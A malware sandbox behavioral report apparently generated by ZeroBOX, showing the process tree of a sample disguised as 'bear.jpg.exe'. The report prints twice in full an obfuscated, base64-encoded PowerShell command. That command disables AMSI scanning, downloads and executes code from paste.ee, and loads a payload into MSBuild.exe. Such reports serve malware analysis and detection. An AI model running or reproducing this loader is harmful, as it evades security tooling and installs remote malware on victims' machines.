popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • bear.jpg.exe "C:\Users\test22\AppData\Local\Temp\bear.jpg.exe"

    112

    • powershell.exe powershell.exe PowERsHEL`l.`ExE -ExecutionPolicy Bypass -w 1 /`e JABSAEEATgA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADkAOQAwADcAMQA3ADIALwA0ADMAOQA3ACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBTAFkAcwB0AGUATQAuAE4ARQBUAC4AVwBlAGIAdQB0AEkATABJAFQAeQBdADoAOgBIAFQAbQBsAEQARQBjAE8ARABFACgAJwAmACMANgA1ADsAJgAjADEAMAA5ADsAJgAjADEAMQA1ADsAJgAjADEAMAA1ADsAJwApACkAVQB0AGkAbABzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAQwBoAEEAcgBdACgAWwBiAFkAVABlAF0AMAB4ADYAMQApACsAWwBjAGgAQQBSAF0AKABbAGIAeQBUAEUAXQAwAHgANgBEACkAKwBbAEMASABBAHIAXQAoAFsAYgB5AFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAUgBdACgANwAxADQAMAAvADYAOAApACkAUwBlAHMAcwBpAG8AbgAiACwAIAAiAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAIgApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBTAFkAcwB0AGUATQAuAE4ARQBUAC4AVwBlAGIAdQB0AEkATABJAFQAeQBdADoAOgBIAFQAbQBsAEQARQBjAE8ARABFACgAJwAmACMANgA1ADsAJgAjADEAMAA5ADsAJgAjADEAMQA1ADsAJgAjADEAMAA1ADsAJwApACkAVQB0AGkAbABzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAQwBoAEEAcgBdACgAWwBiAFkAVABlAF0AMAB4ADYAMQApACsAWwBjAGgAQQBSAF0AKABbAGIAeQBUAEUAXQAwAHgANgBEACkAKwBbAEMASABBAHIAXQAoAFsAYgB5AFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAUgBdACgANwAxADQAMAAvADYAOAApACkAQwBvAG4AdABlAHgAdAAiACwAIAAiAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAIgApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIABbAEkAbgB0AFAAdAByAF0AJABSAEEATgApADsAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ANQBEAGYARwBMACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBuAEMAWQBIAFkAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==

      2260

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e JABSAEEATgA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADkAOQAwADcAMQA3ADIALwA0ADMAOQA3ACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBTAFkAcwB0AGUATQAuAE4ARQBUAC4AVwBlAGIAdQB0AEkATABJAFQAeQBdADoAOgBIAFQAbQBsAEQARQBjAE8ARABFACgAJwAmACMANgA1ADsAJgAjADEAMAA5ADsAJgAjADEAMQA1ADsAJgAjADEAMAA1ADsAJwApACkAVQB0AGkAbABzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAQwBoAEEAcgBdACgAWwBiAFkAVABlAF0AMAB4ADYAMQApACsAWwBjAGgAQQBSAF0AKABbAGIAeQBUAEUAXQAwAHgANgBEACkAKwBbAEMASABBAHIAXQAoAFsAYgB5AFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAUgBdACgANwAxADQAMAAvADYAOAApACkAUwBlAHMAcwBpAG8AbgAiACwAIAAiAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAIgApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBTAFkAcwB0AGUATQAuAE4ARQBUAC4AVwBlAGIAdQB0AEkATABJAFQAeQBdADoAOgBIAFQAbQBsAEQARQBjAE8ARABFACgAJwAmACMANgA1ADsAJgAjADEAMAA5ADsAJgAjADEAMQA1ADsAJgAjADEAMAA1ADsAJwApACkAVQB0AGkAbABzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAQwBoAEEAcgBdACgAWwBiAFkAVABlAF0AMAB4ADYAMQApACsAWwBjAGgAQQBSAF0AKABbAGIAeQBUAEUAXQAwAHgANgBEACkAKwBbAEMASABBAHIAXQAoAFsAYgB5AFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAUgBdACgANwAxADQAMAAvADYAOAApACkAQwBvAG4AdABlAHgAdAAiACwAIAAiAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAIgApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIABbAEkAbgB0AFAAdAByAF0AJABSAEEATgApADsAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ANQBEAGYARwBMACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBuAEMAWQBIAFkAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==

        2888

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf